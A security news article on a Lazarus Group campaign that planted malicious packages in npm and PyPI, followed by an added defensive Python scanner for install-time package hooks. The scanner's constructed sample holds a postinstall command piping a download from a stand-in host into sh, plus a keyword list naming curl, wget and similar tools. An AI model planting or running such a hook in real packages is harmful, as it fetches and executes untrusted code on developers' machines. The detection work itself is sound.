Lazarus Hackers Weaponized 234 Packages Across npm and PyPI to Infect Developers

A cyber espionage campaign targeting software developers has infiltrated two of the world’s largest open source package repositories, with North Korea’s Lazarus Group publishing 234 malicious packages across the npm and PyPI ecosystems.

Between January and July 2025, this state-sponsored operation exposed over 36,000 potential victims to advanced malware designed for long-term surveillance and credential theft.

The malicious packages masqueraded as legitimate developer tools, exploiting the inherent trust developers place in open source ecosystems.

These weaponized packages functioned as espionage implants, engineered to steal secrets from the developer’s machine, profile the host, and establish persistent backdoors that could later be used to reach the systems those developers work on.

The campaign represents a strategic evolution in nation-state cyber warfare, transforming everyday development workflows into attack vectors.

Sonatype analysts identified the threat actor as the Lazarus Group, also known as Hidden Cobra, a North Korean state-sponsored collective associated with the Reconnaissance General Bureau.

This group’s decade-long criminal portfolio includes high-profile attacks such as the 2014 Sony Pictures breach, the 2016 Bangladesh Bank heist, and the devastating 2017 WannaCry ransomware outbreak.

Most recently, the group carried out the $1.5 billion Bybit cryptocurrency theft in 2025.

The campaign did not rely on software bugs; it exploited structural weaknesses in how open source ecosystems are used.

Developers routinely install packages without inspecting their contents or running the installation in a sandbox, and automated CI/CD systems pull malicious dependencies into build pipelines with no human review.

The decentralized nature of many popular projects, often maintained by just one or two individuals, creates opportunities for impersonation and compromise.
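The weakness the paragraphs above describe is that installation itself executes code: npm runs a package’s preinstall, install and postinstall scripts automatically, and a PyPI source distribution runs its setup.py. The following script is an added example written for this article, not Sonatype’s tooling and not code from the campaign. It pulls the install-time hooks out of a package.json, applies a small set of review heuristics, and can walk a node_modules tree; the sample manifests, the package names and the example.invalid URL are constructed for illustration.

```python
"""Flag npm packages whose package.json declares scripts that run
automatically at install time, the hook malicious packages rely on.

Added example for this article (not Sonatype's tooling). The sample
manifests below are constructed, not taken from the real campaign.
"""
import json
import os
import tempfile
from typing import Dict, List, Tuple

# npm lifecycle hooks that execute with no developer action when a
# dependency is installed from the registry.
INSTALL_TIME_HOOKS = ("preinstall", "install", "postinstall")

# Tokens that usually mean a hook fetches or decodes code rather than,
# say, compiling a native addon. A heuristic for triage, not a verdict.
SUSPICIOUS_TOKENS = ("curl ", "wget ", "base64", "eval(", "node -e", "powershell")

# Constructed sample manifests (hypothetical package names).
SAMPLE_BENIGN = json.dumps({
    "name": "tiny-util", "version": "1.0.0",
    "scripts": {"test": "jest", "build": "tsc"},
})
SAMPLE_NATIVE = json.dumps({
    "name": "native-addon", "version": "2.0.0",
    "scripts": {"install": "node-gyp rebuild"},
})
SAMPLE_HOSTILE = json.dumps({
    "name": "dev-helper-utils", "version": "0.1.3",
    "scripts": {"postinstall": "curl -s https://example.invalid/setup | sh"},
})


def install_time_scripts(package_json_text: str) -> Dict[str, str]:
    """Return {hook: command} for every install-time hook in a package.json.

    Unparseable input yields an empty dict rather than an exception so the
    scan can continue across a large dependency tree.
    """
    try:
        manifest = json.loads(package_json_text)
    except json.JSONDecodeError:
        return {}
    scripts = manifest.get("scripts") if isinstance(manifest, dict) else None
    if not isinstance(scripts, dict):
        return {}
    return {hook: scripts[hook] for hook in INSTALL_TIME_HOOKS if hook in scripts}


def is_suspicious(command: str) -> bool:
    """True when the command contains a token that warrants manual review."""
    lowered = command.lower()
    return any(token in lowered for token in SUSPICIOUS_TOKENS)


def audit_node_modules(root: str) -> List[Tuple[str, str, str, bool]]:
    """Walk a node_modules tree; return (package, hook, command, suspicious)."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        if "package.json" not in filenames:
            continue
        with open(os.path.join(dirpath, "package.json"), encoding="utf-8") as fh:
            text = fh.read()
        hooks = install_time_scripts(text)
        if not hooks:
            continue
        # install_time_scripts returned hooks, so the text parsed successfully.
        name = json.loads(text).get("name") or os.path.relpath(dirpath, root)
        for hook, command in hooks.items():
            findings.append((name, hook, command, is_suspicious(command)))
    return findings


if __name__ == "__main__":
    # Build a throwaway node_modules tree from the constructed samples.
    with tempfile.TemporaryDirectory() as tmp:
        for sample in (SAMPLE_BENIGN, SAMPLE_NATIVE, SAMPLE_HOSTILE):
            pkg_dir = os.path.join(tmp, json.loads(sample)["name"])
            os.makedirs(pkg_dir)
            with open(os.path.join(pkg_dir, "package.json"), "w", encoding="utf-8") as fh:
                fh.write(sample)
        for name, hook, command, flagged in audit_node_modules(tmp):
            marker = "REVIEW" if flagged else "info"
            print(f"[{marker}] {name}: {hook} -> {command}")
```

Running the scan before a build is only half of the control. In CI the safer default is to refuse install-time execution altogether (`npm ci --ignore-scripts`, or `ignore-scripts=true` in .npmrc) and, for PyPI, to install wheels only (`pip install --only-binary=:all:`) so that no setup.py runs; packages that genuinely need a build step can then be allow-listed one at a time after review.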

Persistence and Evasion Mechanisms

The Lazarus Group’s persistence tactics centered on modular payload delivery and on evading infrastructure-level detection.

Their malware utilized a multi-stage infection process, where initial package installation triggered dormant code that would activate during subsequent development activities.

The malicious components integrated seamlessly with legitimate development tools, making detection extremely challenging through conventional security scanning methods.

The backdoors these packages installed gave the attackers long-lived access that went unnoticed for extended periods. That access allowed continuous exfiltration from compromised developer environments, which typically hold credentials, API tokens, and proprietary source code.
